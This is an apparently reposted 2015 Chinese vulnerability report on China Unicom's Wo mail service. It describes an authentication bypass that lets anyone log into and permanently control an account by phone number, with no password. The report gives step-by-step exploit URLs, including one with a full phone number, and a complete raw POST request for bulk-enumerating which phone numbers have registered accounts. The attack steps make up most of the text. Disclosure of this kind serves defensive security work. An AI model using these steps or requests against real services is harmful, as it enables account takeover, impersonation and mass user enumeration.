您的位置:首页 > 其它

中国联通沃任意邮箱账户登录(免密码永久控制沃通行证可发私信短信) ---管管侠

2015-05-19 10:49 489 查看
复现流程:

1.首先手机号注册过邮箱

2.然后访问如下链接,找个注册过邮箱的手机号
http://mail.wo.cn/mail/register.action?actionType=editUserDetailInfo&user=185********




3.填写别名,只能设置一次,但是一般都不会设置,哈哈





4.确认后就跳转进去了





5.因为没有密码,是通过这个接口生成cookie跳转进来的





下面是达到永久控制的步骤
http://mail.wo.cn/mail/register.action?actionType=editUserDetailInfo&user=18600111138
继续改别名会提示,已经有别名了,无所谓,访问下面链接,其实是已经登录的
http://mail.wo.cn/welcome.action

















漏洞证明:

6.可批量跑注册过邮箱的手机号了





爆破接口

POST /mail/register.action HTTP/1.1

Host: mail.wo.cn

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:36.0) Gecko/20100101 Firefox/36.0

Accept: */*

Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

X-Requested-With: XMLHttpRequest

Referer: http://mail.wo.cn/mail/register.action
Content-Length: 50

Cookie:

Connection: close

Pragma: no-cache

Cache-Control: no-cache

actionType=CheckUser&user=18600141111&domain=wo.cn

返回208是注册过邮箱的



内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签: